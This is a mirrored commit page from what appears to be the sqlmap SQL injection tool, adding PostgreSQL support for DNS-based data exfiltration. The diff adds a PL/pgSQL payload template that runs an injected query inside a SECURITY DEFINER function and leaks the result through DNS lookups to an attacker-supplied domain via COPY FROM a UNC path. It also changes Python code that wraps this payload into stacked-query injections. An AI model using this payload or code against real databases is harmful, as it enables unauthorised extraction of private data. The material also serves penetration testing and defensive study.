Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 8c6eb4f

Browse files
stamparmstamparm
committed
adding support for PgSQL DNS data exfiltration
1 parent b2afa87 commit 8c6eb4f

5 files changed

Lines changed: 27 additions & 7 deletions

File tree

lib/core/agent.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -805,7 +805,7 @@ def extractPayload(self, inpStr):
805805
retVal = None
806806

807807
if inpStr:
808-
match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr)
808+
match = re.search("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr, re.S)
809809

810810
if match:
811811
retVal = match.group("result")

lib/core/common.py

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1609,11 +1609,17 @@ def getSPQLSnippet(dbms, name, **variables):
16091609
retVal = readCachedFileContent(filename)
16101610

16111611
retVal = re.sub(r"#.+", "", retVal)
1612-
retVal = re.sub(r"(?s);\W+", "; ", retVal).strip()
1612+
retVal = re.sub(r"(?s);\s+", "; ", retVal).strip()
16131613

16141614
for _ in variables.keys():
16151615
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
16161616

1617+
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
1618+
retVal = retVal.replace(_, randomStr())
1619+
1620+
for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
1621+
retVal = retVal.replace(_, randomInt())
1622+
16171623
_ = re.search(r"%(\w+)%", retVal, re.I)
16181624
if _:
16191625
errMsg = "unresolved variable '%s' in SPL snippet '%s'" % (_.group(1), name)

lib/request/connect.py

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,6 +15,7 @@
1515
import urlparse
1616
import traceback
1717

18+
from extra.safe2bin.safe2bin import safecharencode
1819
from extra.socks.socks import ProxyError
1920
from extra.multipart import multipartpost
2021

@@ -549,7 +550,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
549550

550551
value = agent.replacePayload(value, payload)
551552

552-
logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
553+
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))
553554

554555
if place == PLACE.COOKIE and conf.cookieUrlencode:
555556
value = agent.removePayloadDelimiters(value)

lib/techniques/dns/use.py

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -48,7 +48,7 @@ def dnsUse(payload, expression):
4848
count = 0
4949
offset = 1
5050

51-
if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL):
51+
if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
5252
output = hashDBRetrieve(expression, checkConf=True)
5353

5454
if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
@@ -60,7 +60,7 @@ def dnsUse(payload, expression):
6060
while True:
6161
count += 1
6262
prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2))
63-
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL) else MAX_DNS_LABEL / 4 - 2
63+
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
6464
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
6565
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
6666
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
@@ -70,14 +70,14 @@ def dnsUse(payload, expression):
7070
expressionRequest = getSPQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
7171
expressionUnescaped = unescaper.unescape(expressionRequest)
7272

73-
if Backend.isDbms(DBMS.MSSQL):
73+
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
7474
comment = queries[Backend.getIdentifiedDbms()].comment.query
7575
query = agent.prefixQuery("; %s" % expressionUnescaped)
7676
query = agent.suffixQuery("%s;%s" % (query, comment))
7777
forgedPayload = agent.payload(newValue=query)
7878
else:
7979
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
80-
80+
8181
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
8282

8383
_ = conf.dnsServer.pop(prefix, suffix)

procs/postgresql/dns_request.txt

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
DROP TABLE IF EXISTS %RANDSTR1%;
2+
CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
3+
CREATE OR REPLACE FUNCTION %RANDSTR3%()
4+
RETURNS VOID AS $$
5+
DECLARE %RANDSTR4% TEXT;
6+
DECLARE %RANDSTR5% TEXT;
7+
BEGIN
8+
SELECT INTO %RANDSTR5% (%QUERY%);
9+
%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
10+
EXECUTE %RANDSTR4%;
11+
END;
12+
$$ LANGUAGE plpgsql SECURITY DEFINER;
13+
SELECT %RANDSTR3%();

0 commit comments

Comments
 (0)